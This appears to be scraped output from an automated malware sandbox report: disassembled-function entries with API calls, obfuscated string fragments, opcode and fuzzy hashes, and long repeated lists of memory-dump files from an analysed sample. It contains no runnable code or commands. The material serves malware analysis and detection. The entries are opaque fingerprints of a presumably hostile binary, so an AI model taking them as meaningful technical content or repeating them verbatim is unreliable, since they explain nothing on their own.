                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                • API String ID: 0-2746398225
                                                                                                                                                                • Opcode ID: 1feb7d51a913e0125c7b86afb29fb2686dbfbddf0e4a4789cec1af5704e53ec1
                                                                                                                                                                • Instruction ID: 00fdfc8d4aa101ef81ecd60f22a000c1e0b0ab076ec393060a902333236a974f
                                                                                                                                                                • Opcode Fuzzy Hash: 1feb7d51a913e0125c7b86afb29fb2686dbfbddf0e4a4789cec1af5704e53ec1
                                                                                                                                                                • Instruction Fuzzy Hash: 3C4222B2A083518FC724CF28D8917ABB7E6BBD5304F19893DD4D98B356DB359806CB42
                                                                                                                                                                Function 009CF60D Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 845COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(?), ref: 009CFDFC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: #$6$=$\$g$m$w$x
                                                                                                                                                                • API String ID: 237503144-139252074
                                                                                                                                                                • Opcode ID: f3de87819a80d464dc4e1519afa4cc17527e5862fe14c079d5ac7146afb7e546
                                                                                                                                                                • Instruction ID: 3f6df46db5b4dd194f7b154ab768b68b0b20db9e699272838ac3a99996cfcf76
                                                                                                                                                                • Opcode Fuzzy Hash: f3de87819a80d464dc4e1519afa4cc17527e5862fe14c079d5ac7146afb7e546
                                                                                                                                                                • Instruction Fuzzy Hash: 40729332A1D7908BD324DA38C85579FBAD2ABD5320F198B3DE4E9C73D2D67889018743
                                                                                                                                                                Function 009E7740 Relevance: 16.6, Strings: 13, Instructions: 338COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !A/C$$Y)[$1Q>S$DE$O=q?$P-X/$S%g'$Z)o+$f!V#$r$s1z3$}5x7$}9F;
                                                                                                                                                                • API String ID: 0-3413813421
                                                                                                                                                                • Opcode ID: 8499bc07a51b97d20382a93ece31e83547fa45c0dd5f8d0df3faabba4cb0e125
                                                                                                                                                                • Instruction ID: 153fe588ea8799aa6f862de6524b1a2738b4c6a54f570e5399ad3bbf6bbb3206
                                                                                                                                                                • Opcode Fuzzy Hash: 8499bc07a51b97d20382a93ece31e83547fa45c0dd5f8d0df3faabba4cb0e125
                                                                                                                                                                • Instruction Fuzzy Hash: 22C1EDB0A0C380CFD724CF65D851B6BBBF1EF81344F04496CE1998B2A2D7399906CB96
                                                                                                                                                                Function 009DC8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                                                                                • API String ID: 0-635595044
                                                                                                                                                                • Opcode ID: de26b92127d6bff8c828edc1a42604e292ee930484d4aabf9d80e7680ba710d3
                                                                                                                                                                • Instruction ID: 77a1f844b6d9c4ab677fe2952b06017227e481ce778e8920a6703d9d9d739067
                                                                                                                                                                • Opcode Fuzzy Hash: de26b92127d6bff8c828edc1a42604e292ee930484d4aabf9d80e7680ba710d3
                                                                                                                                                                • Instruction Fuzzy Hash: 6F02E0B6A4C3018BC704DF68D8916ABBBF1EFD1314F19892DF4C59B351D2389A09CB96
                                                                                                                                                                Function 009D9AD0 Relevance: 12.1, APIs: 2, Strings: 4, Instructions: 1641COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 009FE110: LdrInitializeThunk.NTDLL(00A012FB,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 009FE13E
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009DA21A
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009DA2AB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                • String ID: VX$_^]\$_^]\$_^]\
                                                                                                                                                                • API String ID: 764372645-2822990893
                                                                                                                                                                • Opcode ID: 9225faeb7a7e541e4996a06dc2f3acfcd06b00eabece508951899598fba26856
                                                                                                                                                                • Instruction ID: 8971042992ed1c7c88a97cc93f4a39c5affac24e2f5ae3912f418e1481e51ef9
                                                                                                                                                                • Opcode Fuzzy Hash: 9225faeb7a7e541e4996a06dc2f3acfcd06b00eabece508951899598fba26856
                                                                                                                                                                • Instruction Fuzzy Hash: 89A235B67493005BD718CB34CC9176BBBA7ABD1314F2DC92EE595873A2D636DC028B42
                                                                                                                                                                Function 009DEB80 Relevance: 12.1, Strings: 9, Instructions: 812COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
